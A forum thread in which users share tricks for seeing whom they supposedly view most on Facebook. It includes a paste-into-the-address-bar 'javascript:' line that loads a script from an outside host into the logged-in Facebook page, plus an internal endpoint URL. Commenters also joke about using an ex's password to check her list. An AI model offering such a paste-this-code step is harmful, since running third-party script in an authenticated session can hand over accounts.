See A List Of Who You Stalk On Facebook

Originally Posted by DMoney82

Can somebody post a link that works in the address bar?

Follow op's first step.
Paste this javascript:frown:function(){var script=document.createElement('script');script.type='text/javascript';script.src='http://thekeesh.com/js/edges.js';document.getElementsByTagName('body')[0           ].appendChild(script);}())

still works...

if you want to do it the ghetto way - json

facebook.com/ajax/typeahead/search/first_degree.php?__a=1&filter[1]=user&lazy=1&viewer=[your_user_id_here_without_brackets]&token=v7&stale_ok=1&__user=[your_user_id_here_without_brackets]

This is dumb... I never even go to half these peoples FB more than once. Are you sure its not just the last page you looked at

The method listed in the link right under "More Info" is much more simpler. I was having trouble but once I clicked on that link, it was real easy.
I had a feeling who my number 1 was going to be. I don't call it stalking though, just admiring from afar.
Sucks that these feelings started developing after I moved from NY, and now she wants to move
30t6p3b.gif
Bad timing, even worse luck.

Am I the only one who thinks that this is some kind of security risk? You have to disable security settings and then let a script run...hmmm no thanks

for all the nter's that claim they don't mess with fb it's surprising to see this page go 4 pages. 
indifferent.gif

It worked!

What do the numbers mean tho??

-114.519 (I don't even care, chicks that coo)
-24.246 my next smang on the fan club
pimp.gif

-19.870 my mom
laugh.gif

-12.518 wait this is MY profile ??

NOT ENOUGH CHICKS ON MY STALKERS LIST
30t6p3b.gif

ex #1, my boy #2..
laugh.gif

i really wish i still knew her PW so i could check hers our.
30t6p3b.gif
at myself for even thinking that.
laugh.gif

Back
Top Bottom